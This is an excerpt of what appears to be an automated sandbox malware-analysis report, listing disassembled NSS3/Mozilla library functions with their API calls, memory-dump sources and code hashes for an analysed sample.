                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                                                          • Opcode ID: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                          • Instruction ID: ee4467573021c97f3681aa39ca6a646853cf66b353c82cec8130079f225be18b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15319EB5A012169FEB18DF65C891EFFBBFAEB45248B10442DD905D7700EB319905CBA0
                                                                                                                                                                                                                          Function 6C584F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C584F5D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C584F74
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C584F82
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C584F90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 17951984-0
                                                                                                                                                                                                                          • Opcode ID: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                          • Instruction ID: b737a11ea2e4bd8b229a847f1895bf220286905af329ca73929f15823929680d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3148B5A016294BEB01CB69DC91BDFB3BCFF85348F05022DEC15A7780EB34A905C691
                                                                                                                                                                                                                          Function 6C4CDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDDF4
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE0B
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE17
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CDE80
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3725328900-0
                                                                                                                                                                                                                          • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                          • Instruction ID: 4c979dc6d2b5743ad676ddee041ea5e964990721235e655728530f1808123b8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731D6B5A41B429BE700CF56C890E52F7E4FFA5318B24822ED81C87B11E770F4A4CB82
                                                                                                                                                                                                                          Function 6C4BFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(78831D74), ref: 6C4BFEC2
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4BFED6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                          • Opcode ID: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                          • Instruction ID: eca3eb02c99a94bbb6204d35a1e1de17acbb75dc241f2a793b920156daec475d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8139b48b1f2fc905f96385cdd5b14ad866a0951d1c01acdd5acca26b74c533dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C21E139A026259BE700EA28DC44FAAB3B4FF05359F450128ED0967F42E731B964CBE0
                                                                                                                                                                                                                          Function 6C4C3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FA1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FBA
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C4AE80C,00000000,00000000,?,?,?,?,6C4B8C5B,-00000001), ref: 6C4C3FFE
                                                                                                                                                                                                                          • PR_SetError.NSS3 ref: 6C4C401A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3021504977-0
                                                                                                                                                                                                                          • Opcode ID: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                          • Instruction ID: 6f825fac5de1b7182bc1fd0c7ae4d7a303302ef0a0fdc6bcad4874fd80e537d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 493220cfc02ca15205e787e755885febee032f4574e451a6b7e700347fa14eef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39314174604704CFD710EF69D584ABABBF0BF85355F01592DD8898BB10EB30E985CB96
                                                                                                                                                                                                                          Function 6C4B4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5003
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B501C
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B504B
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6C4BB60F,00000000), ref: 6C4B5064
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1112172411-0
                                                                                                                                                                                                                          • Opcode ID: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                          • Instruction ID: 0e770dfa2f12cdbb82abe8eb44a789e3d1ae6e29b783663b52bea516ff2a5d51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 649b1c55063d5d591ecdb53fc65da74d71276e4bb65e5543d92fb2ee069cb280
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3129B4A05A06CFDB00EF68C484A6AFBF4FF09305B11852DD859AB700E730E990CBE5
                                                                                                                                                                                                                          Function 6C4D9F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C4DA71A,FFFFFFFF,?,?), ref: 6C4D9FAB
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4D9FD9
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA009
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA045
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3535121653-0
                                                                                                                                                                                                                          • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                          • Instruction ID: 8425838ad69e089eda853244e045d771052dcc8f8327902db9dde1aba6c1a556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E2171B56012069BF700EF55DC60F66B7A9BF8536DF118128982987B81EB76F814CBD0
                                                                                                                                                                                                                          Function 6C4E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E2E08
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E2E1C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C4E2E3B
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4E2E95
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                          • Instruction ID: db37b749ccf335026cdda39b06fe42a99d5733a928bc73a4707bcf05351ba9d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 422129B1D003564BE720DF589D44FAA3764AF9531EF170369DD085B742FBB1E58882D2
                                                                                                                                                                                                                          Function 6C4B1870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B18A6
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C496C34,?,?,00000001,00000000,00000007,?), ref: 6C4B18B6
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C496C34,?,?), ref: 6C4B18E1
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B18F9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                          • Opcode ID: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
                                                                                                                                                                                                                          • Instruction ID: 1b7ec62d1ca0d751c32356fe7e194ce269c52e05a632b13e545b1c02817d04ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E21D075E002199BEB00AF68DC45EEA7B74FF0A318F450168ED156B701E735AA28CBE0
                                                                                                                                                                                                                          Function 6C49ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C49ACC2
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                            • Part of subcall function 6C472AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C470A1B,00000000), ref: 6C472AF0
                                                                                                                                                                                                                            • Part of subcall function 6C472AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C472B11
                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C49AD5E
                                                                                                                                                                                                                            • Part of subcall function 6C4B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C47B41E,00000000,00000000,?,00000000,?,6C47B41E,00000000,00000000,00000001,?), ref: 6C4B57E0
                                                                                                                                                                                                                            • Part of subcall function 6C4B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C4B5843
                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C49AD36
                                                                                                                                                                                                                            • Part of subcall function 6C472F50: CERT_DestroyCertificate.NSS3(?), ref: 6C472F65
                                                                                                                                                                                                                            • Part of subcall function 6C472F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C472F83
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C49AD4F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
